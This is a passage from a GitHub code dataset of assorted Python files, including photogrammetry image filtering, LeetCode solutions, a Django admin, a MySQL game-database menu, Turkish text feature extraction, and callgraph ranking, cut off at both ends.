= 12\n\n output_path = os.path.join(img_path, \"disjoint_img_selection\")\n isExist = os.path.exists(output_path)\n if not isExist:\n os.makedirs(output_path)\n\n print(\"Initiating...\")\n if thread is not None:\n thread.prog_val.emit(round(0))\n\n sfm_data = sfm.sfm_data_handler(sfm_path, None, True)\n camera_points = sfm.extract_camera_points(sfm_data)\n dm = camera_points_distance_matrix(camera_points)\n list_img_model = camera_points['filename'].unique()\n list_img = list_image_in_model(img_path, list_img_model)\n print(\"Done !\")\n\n print(\"Getting image bound... {} images to reproject\".format(len(list_img)))\n json_path = get_bounds(list_img, sfm_path, model_path, output_path, camera_model)\n print(\"Done !\")\n\n print(\"Getting contact matrix...\")\n M, volumes = contact_matrix(json_path, dm, dist_filter, thread)\n pd.DataFrame(M).to_csv(os.path.join(output_path, 'contact_matrix.csv'), index=False, header=False)\n print(\"Done !\")\n\n print(\"Image selection...\")\n if method == \"Forward\":\n keep = pm.forward(M)\n elif method == \"permutations\":\n keep = pm.permutate(M)\n else:\n print(\"Not a valid method, aborting...\")\n if thread is not None:\n thread.prog_val.emit(0)\n thread.finished.emit()\n thread.running = False\n\n return 0\n print(\"Done !\")\n\n pv_utils.save_volumes(volumes, keep, output_path)\n filter_images(img_path, keep, volumes)\n print(\"Saved !\")\n\n if thread is not None:\n thread.prog_val.emit(0)\n thread.finished.emit()\n thread.running = False\n\n return 1\n\n\ndef contact_matrix(json_path, dm, dist_filter, thread=None):\n annotations = pv_utils.parse_annotation(json_path)\n ann_volumes = []\n if thread is not None:\n thread.prog_val.emit(0)\n prog = 0\n tot_len = len(annotations)\n for annotation in annotations:\n if thread is not None:\n thread.prog_val.emit(round((prog / tot_len) * 100))\n prog += 1\n if annotation[0] == 'bound' and len(annotation[1]) != 1:\n mesh = pv_utils.points_to_mesh(annotation[1])\n volume = pv_utils.get_volume(mesh)\n filename = annotation[2]\n ann_volumes.append([filename, volume])\n\n print(\"Starting contact analysis... {} images to analyse\".format(len(ann_volumes)))\n contact_matrix = np.zeros(shape=(len(ann_volumes), len(ann_volumes)))\n if thread is not None:\n thread.prog_val.emit(0)\n tot_len = len(ann_volumes)\n for i in range(len(ann_volumes)):\n if thread is not None:\n thread.prog_val.emit(round((i / tot_len) * 100))\n for j in range(len(ann_volumes)):\n if dm[i, j] < dist_filter:\n k, intersection = ann_volumes[i][1].collision(ann_volumes[j][1], 1)\n if intersection:\n contact_matrix[i, j] = 1\n print(\"Done !\")\n\n return contact_matrix, ann_volumes\n\n\ndef camera_points_distance_matrix(camera_points):\n positions = []\n for index, row in camera_points.iterrows():\n positions.append([float(row['x']), float(row['y']), float(row['z'])])\n\n dm = distance_matrix(positions, positions)\n return dm\n\n\ndef multi_process_reprojection(args):\n sfm_path, model_path, list_imgs, camera_model, annotations, i = args\n sleep(i * 10) # avoid problems in json read\n ann23d = brp.annotationsTo3D(sfm_path, model_path, list_imgs, camera_model)\n\n polygon = []\n for image in list_imgs:\n result = ann23d.reproject(annotations, image, False)\n polygon.extend(result[2])\n\n return polygon\n\n\ndef get_bounds(list_imgs, sfm_path, model_path, output_path, camera_model):\n multipro = True\n annotations = pd.DataFrame(\n columns=['filename', 'shape_name', 'points', 'label_name', 'label_hierarchy', 'annotation_id'])\n\n nb_processes = cpu_count()\n img_list_split = np.array_split(list_imgs, nb_processes)\n args = []\n i = 0\n for img_list_i in img_list_split:\n args.append([sfm_path, model_path, img_list_i, camera_model, annotations, i])\n i += 1\n\n if multipro:\n print(\"Starting multiprocessing reprojection...\")\n results = list(Pool(nb_processes).map(multi_process_reprojection, args))\n print(\"Done !\")\n\n else:\n results = []\n for arg in args:\n results.append(multi_process_reprojection(arg))\n\n polygon = []\n for result in results:\n polygon.extend(result)\n\n json_path = exp_tools.save_bounds_polygons(output_path, polygon)\n\n return json_path\n\n\ndef filter_images(data_path, keep, volumes):\n img_to_keep = []\n for i in range(len(volumes)):\n if keep[i]:\n img_to_keep.append(volumes[i][0])\n\n select_path = os.path.join(data_path, \"disjoint_img_selection\")\n isExist = os.path.exists(select_path)\n if not isExist:\n os.makedirs(select_path)\n\n for file in os.listdir(data_path): # for each image in the directory\n if os.path.isfile(os.path.join(data_path, file)): # Check if is a file\n if imghdr.what(os.path.join(data_path, file)) == \"jpeg\":\n if file in img_to_keep:\n copy(os.path.join(data_path, file), select_path)\n\n\ndef list_image_in_model(dir, img_in_model):\n list_img = []\n for file in os.listdir(dir): # for each image in the directory\n if os.path.isfile(os.path.join(dir, file)): # Check if is a file\n if imghdr.what(os.path.join(dir, file)) == \"jpeg\":\n if file in img_in_model:\n list_img.append(file)\n return list_img\n","repo_name":"marinmarcillat/CHUBACAPP","sub_path":"CHUBACAPP/post_reprojection/no_overlap.py","file_name":"no_overlap.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"24983499100","text":"\"\"\"\n状态压缩+前缀异或和\n\"\"\"\n\nfrom collections import Counter\n\nclass Solution:\n def wonderfulSubstrings(self, word: str) -> int:\n dic = Counter([0])\n ans = 0\n mask = 0\n\n for ch in word:\n step = ord(ch) - ord('a')\n mask ^= (1 << step)\n if mask in dic:\n ans += dic[mask]\n for i in range(10):\n pre_mask = mask ^ (1 << i)\n if pre_mask in dic:\n ans += dic[pre_mask]\n dic[mask] += 1\n \n return ans","repo_name":"thorseraq/leetcode-playground","sub_path":"python/进阶/5799. 最美子字符串的数目.py","file_name":"5799. 最美子字符串的数目.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42833107081","text":"from django.contrib import admin\nfrom .models import Movie\n\nclass MovieList(admin.ModelAdmin):\n list_display = ('name', 'year', 'description', 'rating')\n list_filter = ('name', 'year', 'rating')\n search_fields = ('name', 'description')\n ordering = ['year']\n\n\nadmin.site.register(Movie, MovieList)\n\n","repo_name":"boboyan/assignment2part2","sub_path":"api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"31098267215","text":"class Solution:\n def minAddToMakeValid(self, S: str) -> int:\n uncom = 0\n toadd = 0\n for c in S:\n if c == '(':\n uncom += 1\n else:\n if uncom == 0:\n toadd += 1\n else:\n uncom -= 1\n return uncom + toadd\n\nif __name__ == \"__main__\":\n print(Solution().minAddToMakeValid('))(())('))\n\n","repo_name":"johnxguo/leetcode","sub_path":"921/921.py","file_name":"921.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36168796165","text":"import sys\nimport MySQLdb\n\ndef Conectar_BD(host,usuario,password,nombrebd):\n try:\n db = MySQLdb.connect(host,usuario,password,nombrebd)\n return db\n except MySQLdb.Error as e:\n print(\"No puedo conectar a la base de datos:\",e)\n sys.exit(1)\n\ndef Desconectar_BD(db):\n db.close()\n\ndef ListarMapas(db):\n sql=\"select * from Mapas\"\n cursor = db.cursor(MySQLdb.cursors.DictCursor)\n try:\n cursor.execute(sql)\n registros = cursor.fetchall()\n for registro in registros:\n print(registro[\"nombre\"],\"---\",registro[\"nZonas\"],\" zonas\")\n except:\n print(\"Error en la consulta\")\n\ndef MonstruoSubcadena(db,monstruo):\n sql = \"SELECT * FROM Monstruos WHERE nombre REGEXP '^%s'\"%(monstruo)\n cursor = db.cursor(MySQLdb.cursors.DictCursor)\n try:\n cursor.execute(sql)\n registros = cursor.fetchall()\n for registro in registros:\n print(registro[\"nombre\"])\n return registro[\"nombre\"]\n\n except:\n print(\"Error en la consulta\")\n\ndef ObjetoMonstruo(db,monstruo):\n MonstruoSubcadena(db,monstruo)\n sql = \"SELECT * FROM Objetos WHERE monstruo = (SELECT idMonstruo FROM Monstruos WHERE nombre REGEXP '^%s')\"%(monstruo)\n cursor = db.cursor(MySQLdb.cursors.DictCursor)\n try:\n cursor.execute(sql)\n registros = cursor.fetchall()\n for registro in registros:\n print(registro[\"nombre\"])\n except:\n print(\"Error en la consulta\")\n\ndef NuevoMonstruo(db,nuevo):\n cursor = db.cursor()\n sql=\"insert into Monstruos values (%s, '%s', '%s', %f )\" % (nuevo[\"idMonstruo\"],nuevo[\"nombre\"],nuevo[\"tipo\"],nuevo[\"tamano\"])\n try:\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error al insertar.\")\n db.rollback()\n\ndef borrarObjeto(db,monstruo):\n buscar = MonstruoSubcadena(db,monstruo)\n sql=\"delete from Objetos where monstruo=(select idMonstruo from Monstruos where nombre = '%s')\" % buscar\n cursor = db.cursor()\n try:\n cursor.execute(sql)\n db.commit()\n if cursor.rowcount==0:\n print(\"No hay objetos relacionados con ese monstruo\")\n except:\n print(\"Error al borrar.\")\n db.rollback()\n\ndef AumentarValor(db,porcentaje):\n sql = \"update Objetos SET valor = valor+(valor*%f)/100\"%porcentaje\n cursor = db.cursor()\n try:\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error al cambiar\")\n db.rollback()\n\ndef MostrarMenu():\n menu='''\n 1. Lista los mapas y el total de zonas que tiene cada uno.\n 2. Muestra los monstruos que empiecen por una subcadena.\n 3. Pide por teclado un monstruo y muestra los objetos que suelta al morir.\n 4. Inserta un nuevo monstruo en la tabla Monstruos.\n 5. Borra los objetos de un monstruo indicado por teclado.\n 6. aumenta el valor de los objetos un porcentaje indicado por teclado.\n 0. Salir\n '''\n print(menu)\n while True:\n try:\n opcion=int(input(\"Opción:\"))\n return opcion\n except:\n print(\"Opción incorrecta, debe ser un número\")","repo_name":"robertorodriguez98/proyecto_BD","sub_path":"funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71659692203","text":"#######################################\n# imports\n\nimport maya.cmds as cmds\n\nimport esa.maya.python.lib.deploy as deploy\n\nreload(deploy)\n\n#######################################\n# attributes\n\npermission = \"developer\"\n\n#######################################\n# functionality\n\ndef deployCurrentToolCageRun():\n\tdeploy.deployCurrentToolCageDev()\n\tcmds.confirmDialog(t=\"msg\", message=\"Current ToolGage DEV deployed to TOOLS.\", button=[\"OK\"]) \n\n#######################################\n# execution\n\nif __name__ == \"__main__\": deployCurrentToolCageRun()","repo_name":"esernaalonso/dev","sub_path":"maya/python/script/deployCurrentToolCage.py","file_name":"deployCurrentToolCage.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"27657369783","text":"import codecs\nimport jpype\nimport glob\nimport nltk\nfrom nltk.probability import ConditionalFreqDist\nfrom nltk.tokenize import RegexpTokenizer,sent_tokenize\n\nword_count_dict = {}\n\ndef startJVM():\n\n jpype.startJVM(jpype.getDefaultJVMPath(),\n \"-Djava.class.path=C:/Users/vct_3/Desktop/Tezim/zemberek_jar/zemberek-tum-2.0.jar\", \"-ea\")\n\n Tr = jpype.JClass(\"net.zemberek.tr.yapi.TurkiyeTurkcesi\")\n\n tr = Tr()\n\n Zemberek = jpype.JClass(\"net.zemberek.erisim.Zemberek\")\n\n zemberek = Zemberek(tr)\n return zemberek\n#kelime analizi yapılacak dosyalar okunur\ndef readFile(filename):\n corpus_raw = u\"\"\n print(\"Reading '{0}'...\".format(filename))\n with codecs.open(filename, \"r\") as book_file:\n corpus_raw += book_file.read()\n return corpus_raw\n\n#gelen kelimelerin türü belirlenir\ndef kelimeCozumle(words, zemberek, word_types):\n for word in words:\n if word.strip()>'':\n yanit = zemberek.kelimeCozumle(word)\n if yanit:\n tip = yanit[0].kok().tip()\n if str(tip) in word_types:\n word_types[str(tip)] = word_types[str(tip)] + 1\n\n\ndef explodeSentences(sentences, punkt_dict, zemberek, word_types):\n #cümleler kelimelere parçalanır\n words = []\n for sentence in sentences:\n words.extend(sentence.split())\n kelimeCozumle(sentence.split(), zemberek, word_types)\n\n #Cümle içindeki noktalama işaretlerinin sayısı\n for word in words:\n for punkt in punkt_dict:\n if punkt in word:\n punkt_dict[punkt] = punkt_dict[punkt] + 1\n\n #metin içindeki farklı kelime sayısı\n from collections import Counter\n word_count_dict = Counter(w.title() for w in words)\n return words, word_count_dict\n\ndef writeFile(result):\n file = open(\"clear_data.csv\",\"w\")\n file.write(result)\n file.close()\n\n\ndef startApp():\n # Zemberek nesnesi oluşturuldu.\n zemberek = startJVM()\n book_filenames = sorted(glob.glob(\"C:/Users/vct_3/Desktop/Köşe Yazıları Kopya/*.txt\"))\n result = \"\"\n\n for filename in book_filenames:\n\n punkt_dict = {\"!\": 0, \".\": 0, \",\": 0, \"?\": 0, \":\": 0}\n word_types = {\"ISIM\": 0, \"FIIL\": 0, \"SIFAT\": 0, \"ZAMIR\": 0, \"ZARF\": 0, \"BAGLAC\": 0, \"EDAT\": 0, \"ZAMAN\": 0,\n \"SAYI\": 0, \"OZEL\": 0, \"KISALTMA\": 0, \"SORU\": 0}\n\n # Dosyayı oku\n text = readFile(filename)\n # Dosyadaki cümleleri ayıkla\n sentences = sent_tokenize(text)\n words, word_count_dict = explodeSentences(sentences, punkt_dict, zemberek, word_types)\n\n # Okunan metni dosyaya yazılmak için csv formatına getir.\n result = result + str(len(sentences)) + \",\"\n result = result + str(len(words)) + ',' + str(len(word_count_dict)) + ','\n\n for key, value in punkt_dict.items():\n result = result + str(value) + ','\n for key, value in word_types.items():\n result = result + str(value) + ','\n result = result + (filename.split(\"-\")[1])[:-4] + \"\\n\"\n writeFile(result)\n\n\nstartApp()\n\n# JVM kapat\njpype.shutdownJVM()\n","repo_name":"Souljah1881/Yazar_Tanima","sub_path":"Get_Attributes/Getting_Attributes_of_Authors.py","file_name":"Getting_Attributes_of_Authors.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"20780306773","text":"\"\"\"\nSetup script for libanac\n\"\"\"\n\nimport sys\nfrom setuptools import setup\n\nimport libanac\n\n\ninstall_requires = [\n 'beautifulsoup4',\n 'requests',\n]\n\nif sys.version_info[:2] < (2, 7):\n install_requires.append('argparse')\n\n\nsetup(\n name=libanac.__title__,\n description=libanac.__summary__,\n long_description=open('README.rst').read(),\n url=libanac.__url__,\n\n author=libanac.__author__,\n author_email=libanac.__email__,\n license=libanac.__license__,\n\n version=libanac.__version__,\n\n packages=['libanac'],\n test_suite='tests',\n\n platforms='any',\n keywords=['ANAC', 'SACI', 'CIV Digital'],\n classifiers=[\n 'Natural Language :: English',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX',\n 'Operating System :: POSIX :: BSD',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: Microsoft :: Windows',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: Implementation :: CPython',\n ],\n\n install_requires=install_requires,\n)\n","repo_name":"asenci/libanac","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14430117998","text":"from time import sleep\nfrom os import system, name as sysname\n\ndef animation(level):\n with open(level, \"r\", encoding=\"utf-8\") as f:\n lines = f.readlines()\n f.close()\n\n ascii_lines = lines[2:26]\n truncated_ascii_lines = [line[:80] for line in ascii_lines]\n system(\"clear\") if sysname == \"posix\" else system(\"cls\")\n\n for line in truncated_ascii_lines:\n print(line)\n\n sleep(5)\n\n for x in range(220):\n print(\"\\033[26A\", end= \"\")\n print(\"\\033[2K\", end = \"\") # erase old line, return cursor to beginning\n truncated_ascii_lines = [line[x+1:80+x+1] for line in ascii_lines]\n sleep(0.04)\n for line in truncated_ascii_lines:\n print(line)\n sleep(5)\n\nanimation(\"level0.txt\")","repo_name":"Spellcasting-Devs/Mundane-Reclamation","sub_path":"testing/animation/text_animation.py","file_name":"text_animation.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"3252468522","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 28 2022\n\n@author: yun\n@purpose: Find cycle in graph. Used for identify all ternary zone in Ca-Na-VP phase diagram.\nThis used for calculation chemical potential of Ca, Na and VPO.\n\n# Need to be moved to somewhere else. Need polishing.\n\"\"\"\nimport numpy as np\nfrom compmatscipy.CompAnalyzer import CompAnalyzer\n\n\nclass ternary_chempo:\n\n def __init__(self, edges, data):\n \"\"\"\n Args:\n edges: list of tuples with form [(std formula, std formula)]\n data: energy dictionary with form {'std formula': energy per atom}\n \"\"\"\n self.edges = edges\n self.data = data\n self.cycles = []\n self.vertices = []\n for edge in self.edges:\n for vertex in edge:\n if vertex not in self.vertices:\n self.vertices.append(vertex)\n self.parse_cycles()\n\n @staticmethod\n def gcd(a, b, rtol=1e-03, atol=1e-03):\n # Need caution. Do not use after rounding floats < 3.\n t = min(abs(a), abs(b))\n while abs(b) > rtol * t + atol:\n a, b = b, a % b\n return a\n\n @staticmethod\n def invert(path) -> list:\n\n return ternary_chempo.rotate_to_smallest(path[::-1])\n\n @staticmethod\n # rotate cycle path such that it begins with the smallest node\n def rotate_to_smallest(path) -> list:\n\n n = path.index(min(path))\n return path[n:] + path[:n]\n\n @staticmethod\n def is_visited_node(node, path) -> bool:\n\n return node in path\n\n @staticmethod\n def cmpd_to_fraction(cmpd) -> tuple:\n \"\"\"\n Args:\n Standard Formula\n Returns:\n tuple of Ca, Na in V2(PO4)3\n \"\"\"\n ca = CompAnalyzer(cmpd)\n reduced_ratio = (ca.amt_of_el('O')) / 12\n ca_amt = ca.amt_of_el('Ca') / reduced_ratio\n na_amt = ca.amt_of_el('Na') / reduced_ratio\n\n return ca_amt, na_amt\n\n @staticmethod\n def fraction_to_cmpd(fraction) -> str:\n \"\"\"\n Args:\n tuple of Ca, Na in V2(PO4)3\n Returns:\n Standard Formula\n \"\"\"\n ratio = ternary_chempo.gcd(fraction[0], fraction[1])\n for i in [2, 3, 12]:\n ratio = ternary_chempo.gcd(ratio, i)\n\n formula = ''\n if not fraction[1] == 0:\n formula += 'Na' + str(fraction[1] / ratio)\n if not fraction[0] == 0:\n formula += 'Ca' + str(fraction[0] / ratio)\n\n formula += 'V' + str(np.round(2 / ratio, 3)) + \\\n 'P' + str(np.round(3 / ratio, 3)) + \\\n 'O' + str(np.round(12 / ratio, 3))\n ca = CompAnalyzer(formula)\n\n return ca.std_formula()\n\n @staticmethod\n def is_three_on_line(x, y, z) -> bool:\n\n return (x[0] * (y[1] - z[1]) + y[0] * (z[1] - x[1]) + z[0] * (x[1] - y[1])) == 0\n\n @staticmethod\n def is_point_in_triangle(s, x, y, z) -> bool:\n\n sx = [s[0] - x[0], s[1] - x[1]]\n s_xy = ((y[0] - x[0]) * sx[1] - (y[1] - x[1]) * sx[0]) > 0\n\n if ((z[0] - x[0]) * sx[1] - (z[1] - x[1]) * sx[0] > 0) == s_xy:\n return False\n if ((z[0] - y[0]) * (s[1] - y[1]) - (z[1] - y[1]) * (s[0] - y[0]) > 0) != s_xy:\n return False\n if s == x or s == y or s == z:\n return False\n\n return True\n\n def is_new_path(self, path) -> bool:\n\n return not (path in self.cycles)\n\n def find_new_cycles(self, path) -> None:\n \"\"\"\n Args:\n path: line connecting vertices.\n Returns:\n Add new cycle to self.cycles.\n This does not consider line or non-smallest cycles.\n \"\"\"\n start_node = path[0]\n\n # visit each edge and each node of each edge\n for edge in self.edges:\n node1, node2 = edge\n if start_node in edge:\n if node1 == start_node:\n next_node = node2\n else:\n next_node = node1\n if not ternary_chempo.is_visited_node(next_node, path):\n # neighbor node not on path yet\n sub = [next_node]\n sub.extend(path)\n # explore extended path\n self.find_new_cycles(sub)\n elif len(path) == 3 and next_node == path[-1]:\n # cycle found\n p = ternary_chempo.rotate_to_smallest(path)\n inv = ternary_chempo.invert(p)\n if self.is_new_path(p) and self.is_new_path(inv):\n self.cycles.append(p)\n\n def parse_cycles(self) -> None:\n \"\"\"\n Returns:\n None. update self.cycles.\n parse cycles that are in same line or non-smallest.\n \"\"\"\n for edge in self.edges:\n for node in edge:\n self.find_new_cycles([node])\n\n # change string to fraction of Ca, Na.\n fractions = []\n for i in self.cycles:\n temp = []\n for j in i:\n temp.append(ternary_chempo.cmpd_to_fraction(j))\n fractions.append(temp)\n\n # For removing line or triangle that has point in it.\n min_cycle_list = []\n for i in fractions:\n if not ternary_chempo.is_three_on_line(i[0], i[1], i[2]):\n point_in = False\n for j in self.vertices:\n if ternary_chempo.is_point_in_triangle(ternary_chempo.cmpd_to_fraction(j),\n i[0], i[1], i[2]):\n point_in = True\n break\n if point_in:\n continue\n else:\n min_cycle_list.append(i)\n\n self.cycles = []\n for i in min_cycle_list:\n temp = []\n for j in i:\n temp.append(ternary_chempo.fraction_to_cmpd(j))\n self.cycles.append(tuple(temp))\n\n return\n\n def get_chempo_at_one_cycle(self, x, y, z) -> tuple:\n \"\"\"\n Args:\n x, y, z: str of three coordinates in cycles. In std formula.\n Returns:\n Chemical potential of Ca/Na/VPO\n \"\"\"\n concentrations = np.zeros((3, 3))\n energies = np.zeros((3, 1))\n for i, j in enumerate([x, y, z]):\n ca, na = ternary_chempo.cmpd_to_fraction(j)\n concentrations[i, :] = np.array([ca, na, 17])\n energies[i] = self.data[j] * (ca + na + 17)\n\n chempo = np.linalg.inv(concentrations) @ energies\n\n return chempo\n\n \"\"\"\n Ca_voltage = (-chempo[0][0] - 2.0056) / 2\n Na_voltage = (-chempo[1][0] - 1.3225) / 1\n \"\"\"\n\n def get_chempo_at_cycles(self):\n\n chempo_dict = {}\n for i in self.cycles:\n chempo_dict[i] = self.get_chempo_at_one_cycle(i[0], i[1], i[2])\n\n return chempo_dict\n","repo_name":"YunyeongChoi/CaNaVP","sub_path":"plot/chempo_utils.py","file_name":"chempo_utils.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27387358415","text":"from django.urls import path\n\nfrom .views import *\n\nurlpatterns = [\n path('', OrganizationHome.as_view(), name='orgs'),\n path('keys/', index, name='keys'),\n path('del_org//', delete_org, name=\"del_org\"),\n path('create_org/', create_org, name=\"create_org\"),\n path('update_org//', update_org, name=\"update_org\"),\n path('del_key//', delete_key, name=\"del_key\"),\n path('create_key/', create_key, name=\"create_key\"),\n path('update_key//', update_key, name=\"update_key\"),\n]\n","repo_name":"daniluuuuuuuk/belgosles_test_task","sub_path":"src/organization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35455550664","text":"\"\"\"\ninterface Robot {\n // returns true if next cell is open and robot moves into the cell.\n // returns false if next cell is obstacle and robot stays on the current cell.\n boolean move();\n\n // Robot will stay on the same cell after calling turnLeft/turnRight.\n // Each turn will be 90 degrees.\n void turnLeft();\n void turnRight();\n\n // Clean the current cell.\n void clean();\n}\nExample:\n\nInput:\nroom = [\n [1,1,1,1,1,0,1,1],\n [1,1,1,1,1,0,1,1],\n [1,0,1,1,1,1,1,1],\n [0,0,0,1,0,0,0,0],\n [1,1,1,1,1,1,1,1]\n],\nrow = 1,\ncol = 3\n\nExplanation:\nAll grids in the room are marked by either 0 or 1.\n0 means the cell is blocked, while 1 means the cell is accessible.\nThe robot initially starts at the position of row=1, col=3.\nFrom the top left corner, its position is one row below and three columns right.\n\n\"\"\"\n\n\n\n\"\"\"\nWhen we come to a new cell, we turn left. \nIf we try to go and turn right 3 times, \nwe have covered everything in front of us and we should backtrack. \nIf we can go to a direction, since we are facing backward for backtracking, \nwe should turn left instead of right (if we didn't go, \nwe would still face the direction, not its reverse). \nAlso, when we are done with a cell, we should come back from it. \nHere is a minimalist code to solve the problem.\n\"\"\"\n\nDIRS = [[-1, 0], [0, 1], [1, 0], [0, -1]] # facing up, turning right as index increases\n\n\ndef dfs(robot, coord, dindex, visited):\n visited.add(coord)\n robot.clean()\n last_move = True\n for di in [3, 0, 1, 2]:\n robot.turnLeft() if last_move else robot.turnRight()\n d = DIRS[(dindex + di) % 4]\n new_c = (coord[0] + d[0], coord[1] + d[1])\n\n if new_c not in visited and robot.move():\n dfs(robot, new_c, (dindex + di) % 4, visited)\n robot.move() # come back\n last_move = True\n else:\n last_move = False\n\n\nclass Solution5:\n def cleanRoom(self, robot):\n DIRS = [[-1, 0], [0, 1], [1, 0], [0, -1]] # facing up, turning right as index increases\n visited = set()\n\n def dfs(robot, coord, dindex):\n visited.add(coord)\n robot.clean()\n last_move = True\n\n for di in [3, 0, 1, 2]:\n if last_move: # 固定先左后右\n robot.turnLeft()\n else:\n robot.turnRight()\n d = DIRS[(dindex + di) % 4] # 調整方向\n new_c = (coord[0] + d[0], coord[1] + d[1]) # 下一步的位置\n\n if new_c not in visited and robot.move(): # 看一看可不可以前進\n dfs(robot, new_c, (dindex + di) % 4) # 前進\n robot.move() # come back #精華,有前進就必須有相應的後退!!!原路返回\n last_move = True # 下一步繼續嘗試向左轉\n else: # 某個點訪問過了或者不可訪問\n last_move = False # 下一步向右轉\n\n dfs(robot, (0, 0), 0)\n\nclass Solution:\n def cleanRoom(self, robot):\n \"\"\"\n :type robot: Robot\n :rtype: None\n \"\"\"\n dfs(robot, (0, 0), 0, set())\n\n\n# left, up, right, down\nDIR = ((0, -1), (-1, 0), (0, 1), (1, 0))\n\n\nclass Solution6:\n def cleanRoom(self, robot):\n \"\"\"\n :type robot: Robot\n :rtype: None\n \"\"\"\n # assume we start at (0, 0) the origin\n self.dfs(robot, (0, 0), set(), 1)\n\n def dfs(self, robot, curr_pos, visited, facing_direction):\n robot.clean()\n visited.add(curr_pos)\n\n for i in range(4):\n robot.turnLeft()\n # for i in [0, 3], i+1 means how many times we have turned left\n # (facing_direction - (i + 1)) % 4 therefore, is our new facing direction\n new_direction = (facing_direction - i - 1) % 4\n new_pos = (curr_pos[0] + DIR[new_direction][0], curr_pos[1] + DIR[new_direction][1])\n if new_pos not in visited and robot.move():\n self.dfs(robot=robot,\n curr_pos=new_pos,\n visited=visited,\n facing_direction=new_direction)\n # turn around\n robot.turnLeft()\n robot.turnLeft()\n # move back\n robot.move()\n # face the previous direction, such that we can continue turning left\n robot.turnLeft()\n robot.turnLeft()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Taoge123/OptimizedLeetcode","sub_path":"LeetcodeNew/DFS/LC_489_Robot_Room_Cleaner.py","file_name":"LC_489_Robot_Room_Cleaner.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"15156237694","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\n\ndef gen_callgraph(callgraph_file):\n callgraph = {}\n for line in callgraph_file.readlines():\n fields = line.split(':')\n caller = int(fields[0])\n callees_strs = fields[1].split(',')\n callees = set(map(lambda item: int(item), callees_strs[:-1]))\n callgraph[caller] = callees\n return callgraph \n\n\ndef gen_funcIdCost(funcIdCost_file):\n funcIdCost = {}\n for line in funcIdCost_file.readlines():\n fields = line.split(',')\n funcId = int(fields[0])\n cost = int(fields[1])\n funcIdCost[funcId] = cost\n return funcIdCost\n\n\ndef gen_most_complexity(comp_file):\n comp_99_func_ids = set()\n comp_2_func_ids = set()\n comp_1_func_ids = set()\n for line in comp_file.readlines():\n fields = line.split(',')\n try:\n func_id = int(fields[0])\n except:\n continue\n comp = int(fields[1])\n if comp == 99:\n comp_99_func_ids.add(func_id)\n if comp == 2:\n comp_2_func_ids.add(func_id)\n if comp == 1:\n comp_1_func_ids.add(func_id)\n if len(comp_99_func_ids) > 10:\n print(\"2^N\")\n return comp_99_func_ids\n elif len(comp_2_func_ids) > 0:\n print(\"N^2\")\n return comp_2_func_ids\n else:\n print(\"N\")\n return comp_1_func_ids\n\n\ndef gen_full_callgraph(callgraph):\n full_callgraph = {}\n for caller, callees in callgraph.items():\n worklist = []\n visited = set()\n for callee in callees:\n worklist.append(callee)\n while len(worklist) > 0:\n curr = worklist.pop()\n if curr in full_callgraph:\n for curr_full_callee in full_callgraph[curr]:\n visited.add(curr_full_callee)\n continue\n if curr not in callgraph:\n continue\n for curr_callee in callgraph[curr]:\n if curr_callee not in visited:\n worklist.append(curr_callee)\n visited.add(curr_callee)\n full_callgraph[caller] = visited\n return full_callgraph\n\n\ndef insert_sort(arr, full_callgraph):\n n = len(arr)\n new_arr = []\n new_arr.append(arr[0])\n\n for i in range(1, n):\n j = 0\n insert_flag = False\n while j < len(new_arr):\n if new_arr[j] in full_callgraph \\\n and arr[i] in full_callgraph[new_arr[j]]:\n new_arr.insert(j, arr[i])\n insert_flag = True\n break\n j += 1\n if not insert_flag:\n new_arr.append(arr[i])\n return new_arr\n\n\ndef gen_rank(callgraph, funcIdCost, compFuncIds):\n compFuncIdCost = dict(filter(lambda elem: elem[0] in compFuncIds, funcIdCost.items()))\n compFuncIdSortedByCost = sorted(compFuncIdCost, key=compFuncIdCost.get, reverse=True)\n # for funcId in compFuncIdSortedByCost:\n # print(funcId, compFuncIdCost[funcId])\n full_callgraph = gen_full_callgraph(callgraph)\n #full_callgraph = callgraph\n rank = insert_sort(compFuncIdSortedByCost, full_callgraph)\n for funcId in rank:\n print(funcId, compFuncIdCost[funcId])\n #lower_bound = compFuncIdCost[rank[1]] * 0.5\n #top_rank = []\n 